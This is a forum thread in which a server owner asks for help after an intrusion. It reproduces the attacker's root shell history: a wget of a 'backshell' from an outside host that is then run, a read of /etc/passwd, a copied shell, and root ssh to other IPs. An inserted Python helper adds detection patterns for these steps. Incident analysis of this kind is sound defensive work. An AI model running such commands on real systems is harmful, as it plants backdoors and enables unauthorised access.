Full Version: attempted? hack, BloodBR
The Planet Forums > System Administration > Server Hardware > RaQ Support
Christopher
Logged in and ran 'top' as usual, but got 'permission denied'. Started poking around and found commands entered via root that I didn't enter.

Looks like BloodBR, which I did a little research on and have been told is a group of kids from Brazil (but how does anyone really know) who hack into servers and replace home pages.

Looks like they hacked in a few days ago, but no homepages have been altered, so maybe they were unsuccessful?

Looks like they installed a 'backshell' in tmp. I have renamed that; will that prevent them from being able to use it to log in (I assume it's a back door)? Or would it be installed somewhere else?

Also looks like they copied 'sh' to 'badsh'. I renamed it back.

I have phpbb installed, and read that it is a common access point for them, but I also had ftp'd using my admin password shortly before this hack. Changed my password afterwards, but they may have gotten in before that. Have changed passwords again.

What else should I do, or look for?

Why would something they had done cause 'top' to give me a permission denied? I can su - and then it works ok.

The commands they entered are below:

890 cd /tmp
891 ls
892 cat /etc/httpd/conf/httpd.conf | grep ServerName
893 users
894 ls
895 rm tel*
896 clear
897 cd .x
898 mkdir .x
899 cd .x
900 wget www.xinetd.hpg.com.br/backshell
901 rm ind*
902 ftp ftp.hpg.com.br
903 chmod +x backshell
904 ./backshell
905 ls
906 clear
907 ls -l
908 clear
909 ls -l
910 uname -a;id;uptime
911 cat /etc/passwd
912 cd /bin
913 cp sh badsh
914 clear
915 cd /tmp
916 cd .x
917 cd ;etc
918 cd /etc
919 ftp ftp.hpg.com.br
920 cd httpd/conf/
921 ls
922 ftp ftp.hpg.com.br
923 cd /
924 find / -name *.mdb -print
925 clear
926 users
927 ls
928 ls -l
929 cat /etc/issue
930 uname -a;id;uptime
931 cat /etc/fstab
932 ssh 212.71.97.156 -l root -p 1986
933 ssh 64.6.245.3 -l root -p 1986
934 clear
935 clear
936 exit
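A small triage helper for a history dump like the one above, added here as an example (not code from the original post or the forum): it parses the numbered `history` format and flags the command patterns the post describes (fetch into /tmp, hidden directory, chmod +x and run, copied shell, /etc/passwd read, outbound root ssh). The sample history and the indicator labels are constructed for the example.

```python
import re

# Constructed sample in the numbered `history` format shown in the post.
SAMPLE_HISTORY = """\
897 cd .x
898 mkdir .x
900 wget www.xinetd.hpg.com.br/backshell
903 chmod +x backshell
904 ./backshell
911 cat /etc/passwd
913 cp sh badsh
924 find / -name *.mdb -print
932 ssh 212.71.97.156 -l root -p 1986
936 exit
"""

# (label, regex) heuristics for the steps described in the post; not a
# complete intrusion signature set.
INDICATORS = [
    ("download-tool-fetch", re.compile(r"^(wget|curl|ftp)\b")),
    ("hidden-dir", re.compile(r"^(mkdir|cd)\s+\.\w")),
    ("made-executable", re.compile(r"^chmod\s+\+x\b")),
    ("ran-local-binary", re.compile(r"^\./\S+")),
    ("shell-copied", re.compile(r"^cp\s+(ba)?sh\s+\S+")),
    ("credential-file-read", re.compile(r"^cat\s+/etc/(passwd|shadow)\b")),
    ("outbound-root-ssh", re.compile(r"^ssh\b.*\s-l\s+root\b")),
    ("filesystem-sweep", re.compile(r"^find\s+/\s")),
]

HISTORY_LINE = re.compile(r"^\s*(\d+)\s+(.*)$")

def parse_history(text):
    """Return (number, command) tuples from numbered `history` output."""
    entries = []
    for line in text.splitlines():
        m = HISTORY_LINE.match(line)
        if m:
            entries.append((int(m.group(1)), m.group(2).strip()))
    return entries

def triage(text):
    """Return (number, command, label) for each entry matching an indicator."""
    findings = []
    for number, cmd in parse_history(text):
        for label, pattern in INDICATORS:
            if pattern.search(cmd):
                findings.append((number, cmd, label))
    return findings
```

Each returned tuple is an entry worth checking on disk (the file that chmod +x touched, the copied shell's permissions, the hidden directory), and the history itself should be treated as incomplete since an intruder can edit or clear it.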
raqtweak.com
I suggest you have it OS restored before they pull the server...